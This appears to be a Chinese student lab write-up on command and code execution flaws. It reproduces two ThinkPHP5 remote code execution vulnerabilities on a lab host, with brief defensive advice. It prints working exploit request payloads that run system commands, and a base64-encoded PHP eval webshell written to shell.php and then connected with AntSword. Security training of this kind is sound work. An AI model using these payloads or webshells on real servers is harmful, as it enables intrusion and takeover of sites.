代码执行漏洞和命令执行漏洞——http://159.75.16.25:8089 复现ThinkPHP5 5.0.23远程代码执行漏洞 http://159.75.16.25:8

漏洞执行命令的原理:

代码执行漏洞和命令执行漏洞——http://159.75.16.25:8089 复现ThinkPHP5 5.0.23远程代码执行漏洞 http://159.75.16.25:8_第1张图片

两个条件:

  1. 用户能够函数的输入
  2. 存在可以执行代码的危险函数。

如何预防命令执行漏洞:

PHP内置的两个函数可以有效防止命令执行:

 1. escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,并且还是确保安全的。对于用户输入的部分参数就应该使用这个函数。资料参考:http://cn.php.net/manual/zh/function.escapeshellarg.php

 2.  escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 此函数保证用户输入的数据在传送到 exec() 或 system() 函数,或者 执行操作符 之前进行转义。资料参考:http://cn.php.net/manual/zh/function.escapeshellcmd.php

 3. php中禁止disable_functions(禁用一些危险函数)

 4. 参数值尽量使用引用号包裹,并在拼接前调用addslashes进行转义

当然,修复方法还有很多方式,修复方式一般有两种思维:

  1、黑名单:过滤特殊字符或替换字符  2、白名单:只允许特殊输入的类型/长度

代码执行漏洞和命令执行漏洞的区别:

命令执行漏洞:将用户的输入拼接到命令中去,又对用户的输入没有过滤(原因,以及xss sql),调用一些函数直营系统命令。

代码执行漏洞:在web应用中,为了考虑代码的灵活性和简洁性会调用一些危险的函数去处理(eg:eval函数),将一些字符串当成php代码去执行,没有考虑用户是否能控制这些代码,造成了代码执行的危害。

 

http://159.75.16.25:8089       复现ThinkPHP5 5.0.23远程代码执行漏洞

      http://159.75.16.25:8087      复现Thinkphp5 5.0.22/5.1.29远程代码执行漏洞

复现漏洞要求:

(1)操作步骤配截图。

(2) 要求复现时进行挂马操作,小马大马都可,需要有webshell管理工具截图。

并简述如何修复这两个版本的漏洞?言之有理即可

http://159.75.16.25:8089       复现ThinkPHP5 5.0.23远程代码执行漏洞

http://159.75.16.25:8089       复现ThinkPHP5 5.0.23远程代码执行漏洞

  • 打开该网站:

代码执行漏洞和命令执行漏洞——http://159.75.16.25:8089 复现ThinkPHP5 5.0.23远程代码执行漏洞 http://159.75.16.25:8_第2张图片

  • 访问该网页的index页面:

代码执行漏洞和命令执行漏洞——http://159.75.16.25:8089 复现ThinkPHP5 5.0.23远程代码执行漏洞 http://159.75.16.25:8_第3张图片

执行whoami,访问url :http://159.75.16.25:8089/index.php?s=captcha?s=captcha

代码执行漏洞和命令执行漏洞——http://159.75.16.25:8089 复现ThinkPHP5 5.0.23远程代码执行漏洞 http://159.75.16.25:8_第4张图片

_method=__construct&filter[]=system&method=get&get[]=whoami

  • 使用php语言:_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd查看当前目录:得到/var/www/public

代码执行漏洞和命令执行漏洞——http://159.75.16.25:8089 复现ThinkPHP5 5.0.23远程代码执行漏洞 http://159.75.16.25:8_第5张图片

  • 构造php文本:

代码执行漏洞和命令执行漏洞——http://159.75.16.25:8089 复现ThinkPHP5 5.0.23远程代码执行漏洞 http://159.75.16.25:8_第6张图片

  • 发送post请求到页面,之后访问shell.php

代码执行漏洞和命令执行漏洞——http://159.75.16.25:8089 复现ThinkPHP5 5.0.23远程代码执行漏洞 http://159.75.16.25:8_第7张图片

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n bHh5PD9waHAgZXZhbChAJF9QT1NUWydyb290J10pOyA/Pmx4eQ== | base64 -d > shell.php

  • 访问shell.php ,出现lxylxy

代码执行漏洞和命令执行漏洞——http://159.75.16.25:8089 复现ThinkPHP5 5.0.23远程代码执行漏洞 http://159.75.16.25:8_第8张图片

  • 使用蚁剑进行连接:

代码执行漏洞和命令执行漏洞——http://159.75.16.25:8089 复现ThinkPHP5 5.0.23远程代码执行漏洞 http://159.75.16.25:8_第9张图片

  • 挂马复现成功。

代码执行漏洞和命令执行漏洞——http://159.75.16.25:8089 复现ThinkPHP5 5.0.23远程代码执行漏洞 http://159.75.16.25:8_第10张图片

http://159.75.16.25:8087      复现Thinkphp5 5.0.22/5.1.29远程代码执行漏洞

  • 打开该网址:

代码执行漏洞和命令执行漏洞——http://159.75.16.25:8089 复现ThinkPHP5 5.0.23远程代码执行漏洞 http://159.75.16.25:8_第11张图片

  • 执行whoami:将whoami的代码跟在url后面。

http://159.75.16.25:8087/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

代码执行漏洞和命令执行漏洞——http://159.75.16.25:8089 复现ThinkPHP5 5.0.23远程代码执行漏洞 http://159.75.16.25:8_第12张图片

  • 将想要嵌入的代码通过base64编码后紧跟在url后面。

代码执行漏洞和命令执行漏洞——http://159.75.16.25:8089 复现ThinkPHP5 5.0.23远程代码执行漏洞 http://159.75.16.25:8_第13张图片

代码执行漏洞和命令执行漏洞——http://159.75.16.25:8089 复现ThinkPHP5 5.0.23远程代码执行漏洞 http://159.75.16.25:8_第14张图片

  • 使用蚁剑进行连接。

代码执行漏洞和命令执行漏洞——http://159.75.16.25:8089 复现ThinkPHP5 5.0.23远程代码执行漏洞 http://159.75.16.25:8_第15张图片

  • 查看目录:

代码执行漏洞和命令执行漏洞——http://159.75.16.25:8089 复现ThinkPHP5 5.0.23远程代码执行漏洞 http://159.75.16.25:8_第16张图片

如何修复:

ThinkPHP 5.0< 5.0.22修复方法:在think\APP类的module方法的获取控制起的代码在后面加上

代码执行漏洞和命令执行漏洞——http://159.75.16.25:8089 复现ThinkPHP5 5.0.23远程代码执行漏洞 http://159.75.16.25:8_第17张图片

你可能感兴趣的:(网络安全)